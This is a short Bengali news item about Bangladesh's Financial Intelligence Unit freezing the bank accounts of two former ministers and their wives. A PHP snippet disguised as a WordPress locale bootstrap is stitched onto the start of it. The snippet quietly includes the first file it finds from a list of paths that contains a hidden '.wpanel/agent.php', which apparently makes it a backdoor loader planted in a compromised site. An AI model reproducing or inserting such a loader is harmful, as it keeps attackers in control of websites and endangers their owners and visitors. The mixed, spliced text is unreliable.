// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } }
এইচটি বাংলা অনলাইন ডেস্ক : সাবেক ভূমিমন্ত্রী সাইফুজ্জামান চৌধুরী, তার স্ত্রী রুখমিলা জামান চৌধুরী, সাবেক তথ্য প্রতিমন্ত্রী মোহাম্মদ এ আরাফাত এবং তার স্ত্রী শারমিন মুশতারীর ব্যাংক হিসাব ফ্রিজ করা হয়েছে।
আজ ১২ আগস্ট সোমবার এই সংক্রান্ত নির্দেশ জারি করে বাংলাদেশ ফাইন্যান্সিয়াল ইন্টেলিজেন্স ইউনিট (বিএফআইইউ)। আগামী ৩ কার্যদিবসের মধ্যে ঐসব হিসাবের লেনদেন এবং স্থিতির তথ্য জানানোর নির্দেশও দেওয়া হয়েছে।
এর আগে গত রোববার সাবেক পররাষ্ট্রমন্ত্রী হাছান মাহমুদ ও তার পরিবারে স্ত্রী, মেয়ের অ্যাকাউন্ট ফ্রিজ করে বিএফআইইউ।